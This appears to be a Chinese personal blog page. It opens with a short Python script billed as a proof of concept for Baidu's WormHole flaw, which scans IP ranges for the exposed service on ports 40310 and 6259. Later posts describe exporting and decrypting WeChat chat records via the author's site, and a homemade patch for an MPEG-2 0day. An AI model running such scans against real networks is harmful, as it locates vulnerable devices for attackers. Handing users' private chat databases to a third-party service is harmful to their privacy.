百度WormHole漏洞检测POC
WormHole的检测代码,随手python写的。
#exploit write by fenlog,baidu wormhole POC.
#QQ:345382462
import urllib2, urllib
import sys
headers = {
"Accept": "*/*",
"Host": "127.0.0.1",
"remote-addr": "127.0.0.1",
"Referer": "http://www.baidu.com/"
}
def ip2num(ip):
ip = [int(x) for x in ip.split('.')]
return ip[0]<<24 | ip[1]<<16 | ip[2]<<8 | ip[3]
def num2ip(num):
return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)
def URLRequest(url):
try:
request = urllib2.Request(url = url,headers = headers)
response = urllib2.urlopen(request)
return response.read()
except:
return ""
if len(sys.argv) == 3:
ipstart = ip2num(sys.argv[1])
ipend = ip2num(sys.argv[2])
elif (len(sys.argv) == 2):
ipstart = ip2num(sys.argv[1])
ipend = ipstart
else:
print "Baidu WarmHole POC by www.fenlog.com\nUsage1: %s TargetIP \nUsage2: %s StartIP EndIP" % (sys.argv[0], sys.argv[0])
exit(0)
if (ipstart > ipend):
print "Target IP Err"
exit(0)
urllib2.socket.setdefaulttimeout(3)
for targetip in range(ipstart, ipend + 1):
strip = num2ip(targetip)
print "Scan %s..." % (strip)
url1 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 40310)
url2 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 6259)
ret = URLRequest(url1)
if (len(ret) == 0):
ret = URLRequest(url2)
if (len(ret) > 0):
print "Found %s:%s" % (strip, ret)
print "Scan %d IPs Finish!" % (ipend - ipstart + 1)安卓微信聊天记录导出方法
微信聊天记录备份恢复助手正式发布!
微信聊天记录恢复助手 软件下载地址: http://www.fenloger.com/ 同时支持安卓和苹果设备哦!~
///////////////////////////////////////// /////////////////////////////////////////
这里就说明一下最常用的简单可行的通用方法,对于一些特殊机型或者特殊方法就不提了。
大概的讲两个方法吧,一个是所有安卓手机通用的方法,另一个是安卓4.0及以上版本的方法。
1.安卓4.0及以上版本手机导出方法
查看安卓系统版本请依次点击“程序--设定--关于设备(菜单最下面)”,里面有Android版本选项。如果不是4.x.x,请跳过这个方法直接看下面的通用方法。
...
在线微信恢复查看使用说明
微信聊天记录备份恢复助手正式发布!
微信聊天记录恢复助手 软件下载地址: http://www.fenloger.com/ 同时支持安卓和苹果设备哦!~
///////////////////////////////////////// /////////////////////////////////////////
1、注册
这个操作不多说了,用户名只能使用纯数字,其他的没有任何限制比如长度、密码格式什么的,建议大家用户名长一些,密码负责点,忘了密码请联系博主。十分抱歉没有做完善,原谅博主这个精力有限的男人
2.导出记录
...
安卓手机微信聊天记录恢复查看网站公测啦!
微信聊天记录备份恢复助手正式发布!
微信聊天记录恢复助手 软件下载地址: http://www.fenloger.com/ 同时支持安卓和苹果设备哦!~
刚刚开通了群,欢迎各位加入参与互动讨论与问题反馈!!群号:330726869
///////////////////////////////////////// /////////////////////////////////////////
///////////////////////////////////////// /////////////////////////////////////////
以下为原WEB版本说明,逐步停止更新,请使用上述软件版本。
经过将近半个月的准备,花费了博主所有的空余时间和部分休息时间,现在终于可以出来见见人了。
安卓微信聊天记录解密查看恢复,平台链接:http://wx.fenlog.com
...
MPEG-2视频0day漏洞补丁
这几天MPEG-2视频0day漏洞闹得沸沸扬扬,最郁闷的是昨天晚上上网的时候我还中了这个,结果感染了猫癣病毒···不过好在我见多识广,第一反应不对劲立刻冷重启了,然后一一清除···所以我深深的体会到了0day的恐怖和没有打补丁的那种无助。于是乎从某挂了马的网站上分析出了网马,看了看代码,写了一个免疫器。在微软出补丁前,还是这么救济吧···
...